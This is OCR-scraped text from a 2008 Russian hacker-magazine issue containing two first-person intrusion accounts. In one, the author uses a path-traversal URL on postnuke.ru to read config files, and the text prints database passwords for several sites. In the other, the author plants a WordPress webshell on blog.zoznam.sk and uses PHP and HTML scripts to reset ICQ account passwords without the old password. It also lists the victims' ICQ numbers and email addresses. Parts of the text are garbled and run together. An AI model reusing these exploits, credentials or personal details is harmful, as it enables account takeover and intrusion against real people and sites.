книги хакеры / журнал хакер / 117_Optimized

Суть баги проста

Disallow: /pnTemp

Disallow: /docs

Disallow: /javascript

К сожалению, chmod’ы на серверы были расставлены грамотно, так что никакой дополнительной информации мне получить не удалось.

Тогда я вспомнил об удобном сервисе по сбору данных из Гугла — madnet.name/tools/madss. Вбив урл атакуе-

мого ресурса, буквально через пару секунд я лицезрел ответ:

http://postnuke.ru IP: 91.194.77.73 ТИЦ: 550

PR: 5 Reverse DNS:

medoc.solidno.ru

Сервер:

Apache/2.0.52 (CentOS)

Запрещено к индексированию: admin.php

config header footer pntables referer /images /includes /modules/NS- /pnadodb /themes /pnTemp /docs /javascript

Сайты на сервере(ReverseIP): energogid.ru [83.222.23.124] [83.222.23.174] files.postnuke.ru [91.194.77.73] www.postnuke.ru [91.194.77.73] www.solidno.ru [91.194.77.73]

Я безрезультатно проверил все имеющиеся ресурсы и углубился в изучение структуры и функционала www. postnuke.ru. Через некоторое время мое внимание

Корень веб-каталога www.postnuke.ru

привлек модуль Static Docs, который располагался по адресу:

http://www.postnuke.ru/index. php?module=Static_Docs&func=view

Когда я прошел по линку, передо мной оказалась директория с названием «downloads»:

http://www.postnuke.ru/index. php?module=Static_Docs&func=view&f=downloa ds/index.html

Взглянув на адресную строку браузера, а именно на параметр «f» и его значение, я с удивлением обнаружил, что модуль не имеет привязки к конкретному каталогу, а значит...

Правильно! Я мог совершенно спокойно гулять по серверу, читая файлы и просматривая интересующие меня каталоги.

Эксплуатируем уязвимость

Первым делом я принялся искать конфиги для подключения к СУБД. Корень веб-каталога располагался в /opt/www/postnuke.ru. Сформировав запрос вида:

http://www.postnuke.ru/index. php?module=Static_Docs&func=view&f=../.. /../../../../../../../../../../../../opt/ www/postnuke.ru

—  я без труда получил листинг веб-директории сайта:

dvd

На нашем диске ты найдешь полное

видео к статье. Приятного просмотра!

warning

Внимание! Информация представлена исключительно с целью ознакомления! Ни автор, ни редакция за твои действия ответственности не несут!

Конфиг в надежных руках

Меня заинтересовали два конфига: config.php и config-old.php. Оба представляли собой стандарт­ ные конфиги PostNuke. Прочитав первый (config. php), я добрался до заветного аккаунта к СУБД:

$pnconfig['dbtype'] = 'mysql'; $pnconfig['dbhost'] = 'localhost'; $pnconfig['dbuname'] = 'postnukeru'; $pnconfig['dbpass'] = 'ru178$500'; $pnconfig['dbname'] = 'postnukeru'; $pnconfig['system'] = '0'; $pnconfig['prefix'] = 'postnuke'; $pnconfig['encoded'] = '0';

В старой версии конфига поля логина и пароли были пустыми — непонятно, зачем его вообще хранили на сервере :).

Тем временем я уже заливал MySQL-клиент на один из поломанных ранее серверов, дабы подключиться к БД www.postnuke.ru и сделать несколько дампов баз. Однако, меня ждал облом — удаленное подключение к MySQL в моем случае было невозможным. Хотя оставалась надежда, что с другими пользователями СУБД все может быть иначе и нужно только поискать. Потратив около получаса на парсинг всевозможных каталогов на сервере, я составил список добытых аккаунтов от MySQL:

1.

define('DB_SERVER', 'localhost'); define('DB_SERVER_USERNAME', 'cosmo'); define('DB_SERVER_PASSWORD', 'xxxcosmo'); define('DB_DATABASE', 'eng');

2.

$conf->DBserver = importPost( "DBserver", "localhost" );

$conf->DBname = importPost( "DBname", "wikidb" );

$conf->DBuser = importPost( "DBuser", "wikiuser" );

$conf->DBpassword = importPost( "DBpassword" ); $conf->DBpassword2 = importPost( "DBpassword2" );

$conf->DBprefix = importPost( "DBprefix" );

3.

mysql://hobby:rt76ju89ew@localhost

4.

$db_url = 'mysql://travel:rt76ju89ew@ localhost/travel';

$db_prefix = '';

5.

mysql://padebesi:irbenaju131@localhost/ padebesi

В моем распоряжении появилось несколько аккаунтов. Казалось бы, сомневаться в успехе не приходилось, но MySQL-клиент раз за разом выдавал сообщение об ошибке, сообщая, что удаленное подключение к СУБД на postnuke.ru невозможно. Такой расклад меня не

устраивал. Я принялся искать бэкапы, которые могли бы пролить свет на админки хостящихся на сервере ресурсов. Вскоре соответствующая директория была найдена

— /opt/data/BACKUP:

Сервис от madnet.name

etc.lst 275 K Unknown 11 Aug, 2007 г. — 11:15

Каталог с незамысловатым названием «sql» хранил в себе много вкусностей:

К сожалению, слить найденные бэкапы не удавалось. Бажный модуль попросту отказывался показывать их содержимое — то ли по причине отсутствия прав, то ли в результате ошибки выполнения самого модуля. Удача в этот раз явно обошла меня стороной, однако сдаваться в мои планы не входило, и я принялся осматривать вебкаталог сервера — /opt/www:

072

Бажный модуль Static Docs

Можно было попробовать залогиниться в админку какого-нибудь из сайтов, использовав аккаунты от MySQL. Потратив на попытки более часа, я оставил эту затею и принялся окучивать FTP, что тоже не принесло результатов. Я вынужден был отдать должное админам и отступить... В этот раз довести начатое до конца не удалось. Почему? Об этом читай ниже.

Что помогло админам

С точки зрения безопасности, огромным плюсом оказалось ограничение в правах и в возможности удаленного подключения пользователей MySQL. Все найденные аккаунты мне попросту не понадобились. Стоит отметить, что везде использовались разные и сложные пароли. Именно поэтому так и не удалось заюзать пароли от мускула «в иных целях». Но налицо был и ряд ошибок: начиная от использования бажного модуля и заканчивая кривым разграничением прав пользователей на сервере (благодаря чему я шарил по всем необходимым каталогам). В любой бочке меда можно найти ложку дегтя — или наоборот :). z

xàêåð 09 /117/ 08

Маг

/ icq 884888 /

пОИсКИпарТНера

как-то раз мне пришла идея проверить всех локализованных партнеров тети аси на наличие распространенных паблик движков. Поиски увенчались успехом на словацком портале Zoznam.sk, а, если точнее,

— по адресу blog.zoznam.sk. радости не было предела, когда, открыв html-исходник страницы, я увидел чарующую надпись:

<meta name="generator" content="WordPress wordpress-mu-

находится в www/blog.zoznam.sk/wp-content/blogs.dir/680/files/2008/01/ mywebshell.jpg.

теперь требовалось наваять простенький html-эксплойт для включения шелла в активные плагины. для этого я зашел на страничку http:// hijacked.blog.zoznam.sk/wp-admin/options-general.php, сохранил ее

к себе на винт и открыл в текстовом редакторе. изменить нужно было следующие поля:

Мой веб-шелл в корне blog.zoznam.sk

плагинов в БД в виде списка, а новые — в виде сериализованного массива. При изменении версии БД на более старую вордпресс автоматически перебрасывает на страницу upgrade.php, где текстовые списки плагинов конвертируются в сериализованный массив.

НасервереЗознама

После отсылки нужных данных из моей ядовитой формы, а также апгрейда блога, — я увидел свой новоиспечен-

ный шелл по адресу http://hijacked.blog.zoznam.sk/index. php?loleg. И почему-то мне не показался необычным тот факт, что все директории и файлы на сервере словацкого партнера аси оказались открыты на запись :).

Вариантов,чтоделатьдальше,быломного.Можнослитьсебе всюбазуданныхасекЗознама(ноязнал,чтоценныхшестизнаковтамнет),аможно,поаналогиисбигмиром,написатьреггер асек—ипростосидеть«рыбачить»красивыеномера.Выбрав второйвариантиопираясьнаскриптыдлядоступакICQIPSAPI, сохранившиесясбигмира,яипринялсязареггерасек.

Реггер,реггер

Я решил изучить возможные нововведения в интерфейсе IPS и составил простенький php-скрипт:

<? $site='ips.icq.com'; $path='/icq.php?wsdl'; $data=' ';

$out = "POST $path HTTP/1.1\r\n"; $out .= "Host: $site\r\n";

$out .= "Content-type: text/xml\r\n"; $out .= "Connection: Close\r\n";

$out .= 'Content-Length: ' . strlen($data) . "\r\n";

$out .= "SOAPAction: https://ips.icq.com/icq. php\r\n";

$out .= "User-Agent: Opera\r\n";

$out .= "Referer: http://icq.zoznam.sk\r\n"; $out .= "Cookie: 1\r\n\r\n";

fwrite($fp, $out.$data); $shnyaga='';

while (!feof($fp))

{

$shnyaga .=fread($fp, 4800);

}

fclose($fp); print $shnyaga; ?>

Самое интересное, что я вынес из ответа сервера, было обязательное указание IP-адреса при регистрации нового

<element name="uin" type="xsd:string" /> <element name="ip" type="xsd:string" /> <element name="email" type="xsd:string" /> <element name="newpass" type="xsd:string" /> <element name="id" type="xsd:string" /> </all>

</complexType>

взяв за основу тот факт, что <element name="password" type="xsd:string" />является необязательным элементом при составлении запроса на смену пароля к привязанному номеру, я в очередной раз задействовал все свои кодерские способности. и написал новый скрипт, который отправлял пакет на смену пароля к номеру и имел следующие поля (внешний вид скрипта ты сможешь снова увидеть на скриншоте):

<form method="POST» action="?"> UIN<br/>

<input name="uin" value=""/><br/>

мыло от него<br/>

<input name="email" value=""/><br/>

новый пасс<br/>

<input name="newpass» value=""/><br/> <input type="submit" value="Сменить пас-

сворд!"/> </form>

оставалось найти несколько нумов, привязанных к зознаму. что я успешно и сделал, заюзав поиск на форуме асечного портала asechka.ru. Подопытными номерами стали:

100796;dimka4u@zoznam.sk

127744;Jozef.Kaffka@zoznam.sk

250020;typekFernando@zoznam.sk

272768;p0var@zoznam.sk

344365;eliran82@zoznam.sk

404196;Michaela.Mullerova@zoznam.sk

422222;422222@zoznam.sk

481008;mirec1234@zoznam.sk

506208;E.EWRgt@zoznam.sk

555885;ko27nm90pcx@zoznam.sk

661117;iml@zmail.sk

этобылиединственные6-знаки,хранившиесявбазе данныхzoznam.sk.Применивкнимсвойнехитрыйскрипт,я убедился,чтостарыйпарольдействительноненужноуказывать.Паролиуспешносменились.нотаккакяоченьдобрый человек,ярешилотдатьвсеномераобратноихвладельцам.

уДачНОГООбщеНИявасе

ивновьадскимобразомвзломаночереднойлокализован- ныйпартнертетиаси!какипрежде—благодарямоему любимомувордпрессу.былозареганомногоновых9-знаков дляспамаипрочихцелей.удалосьпошатнутьавторитетне толькокрупнейшегоинтернет-портала,ноисамойicq.сom, котораяприрегистрацииновыхномеровдосихпорнемного подтормаживает.

ниоднаизупомянутыхвстатьеуязвимостейнезакрытадо сихпор(правда,блогиназознамеяобезопасилотпоследующихвзломовописаннымспособом).

Пооколоасечномумируходитнепровереннаяинформацияо взломечешскогопартнерааськиhttp://atlas.cz.Поэтомусоветуюникогданеиспользоватьлокализованныхпартнеров

иихпривязки,аюзатьтолькопроверенныйвременем(хотяи тоженесколькоразвзломанный)icq.com. z